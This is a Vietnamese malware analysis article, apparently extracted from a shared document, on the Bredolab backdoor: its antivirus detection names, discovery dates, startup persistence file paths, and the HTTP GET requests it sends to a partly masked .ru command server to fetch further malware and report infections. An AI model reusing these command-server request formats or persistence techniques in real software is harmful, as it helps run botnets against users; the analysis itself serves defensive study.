Tìm hiểu về phần mềm độc hại Backdoor.Win32.Bredolab.eua pps
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (260.72 KB, 5 trang )
Tìm hiểu về phần mềm độc hại Backdoor.Win32.Bredolab.eua
Khái niệm backdoor được dùng đ
ể chỉ những
phần mềm độc hại, được tạo ra để cài, phát
tán mã độc vào máy tính người của người
dùng.
Nếu xét về khía cạnh chức năng và kỹ thuật,
Backdoor khá giống với hệ thống quản lý và
điều phối phần mềm. Những ứng dụng độc hại
này được tạo ra để làm bất cứ yêu cầu gì mà tin
tặc muốn: gửi và nhận dữ liệu, kích hoạt, sử
dụng và xóa bất cứ file nào đó, hiển thị thông
báo lỗi, tự khởi động lại máy tính …
Những chương trình như này thường được sử
dụng để liên kết những nhóm máy tính bị lây
nhiễm để tạo nên mô hình mạng botnet hoặc
zombie thường gặp. Và nh
ững kẻ đứng đằng sau
tổ chức này có thể dễ dàng tập trung 1 số lượng
lớn hoặc rất lớn các máy tính – lúc này đã trở
thành công cụ cho tin tặc, nhằm thực hiện
những âm mưu hoặc mục đích xấu.
1 bộ phận khác của Backdoor cũng có khả năng
lây lan và hoạt động giống hệt với Net-Worm,
chúng ta có thể phân biệt chúng qua khả năng
lây lan, Backdoor không thể tự nhân bản và lây
lan, trái ngược hoàn toàn với Net-
Worm. Nhưng
chỉ cần nhận được lệnh đặc biệt từ phía tin tặc,
chúng sẽ đồng loạt lây lan và sản sinh với số
lượng không thể kiểm soát được.
Tại bài viết này, chúng ta sẽ cùng thảo luận về
mẫu Backdoor.Win32.Bredolab.eua (được đặt
tên bởi Kaspersky), hoặc còn được biết đến dư
ới
tên gọi:
- Trojan: Bredolab!n (McAfee)
- Mal/BredoPk-B (Sophos)
- Trj/Sinowal.DW (Panda)
- TrojanDownloader:Win32/Bredolab.AA
(MS(OneCare))
- Trojan.Botnetlog.126 (DrWeb)
-
Win32/TrojanDownloader.Bredolab.BE trojan
(Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR/Crypt.XPACK.Gen (AVIRA)
- W32/Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP]
(FSecure)
- Trojan-Downloader.Win32.Bredolab
(Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)
Chúng được phát hiện vào ngày 3/6/2010 lúc
16:16 GMT, “rục rịch” hoạt động tại 4/6/2010
lúc 03:28 GMT, và các thông tin phân tích chi
tiết được đăng tải vào ngày 12/7/2010 lúc 11:33
GMT.
Miêu tả chi tiết về mặt kỹ thuật
Về bản chất, những chương trình mã độc như
thế này thường được quản lý bởi server ri
êng, và
có nhiệm vụ tải các malware khác về máy tính
đã bị lây nhiễm.
Như tất cả các chương trình đ
ộc hại khác, chúng
tự kích hoạt cơ chế khởi động cùng hệ thống
bằng cách copy file thực thi vào thư mục
autorun:
%Startup%\siszpe32.exe
và tạo ra những file có dạng như sau:
%appdata%\avdrn.dat
Về phương thức Payload, chúng thường xuyên
kết nối tới server:
http://*****lo.ru
nơi chúng gửi đi những yêu cầu như sau:
GET
/new/controller.php?action=bot&entity_list=&
uid=&first=1&guid=880941764&v=15&rnd=8
520045
Và kết quả là chương trình sẽ nhận lại lệnh, mã
cụ thể để tải các ứng dụng malware khác, chúng
sẽ được lưu tại thư mục sau và tự động kích
hoạt:
%windir%\Temp\.exe
Sau đó chúng tiếp tục gửi đi những yêu cầu
khác:
GET /new/controller.php?
action=report&guid=0&rnd=8520045&guid=
&entity=1260187840:unique_start;
1260188029:unique_start;1260433697:unique_
start;1260199741:unique_start
những dữ liệu này thông báo v
ới hệ thống server
rằng máy tính của nạn nhân đã bị lây nhiễm.
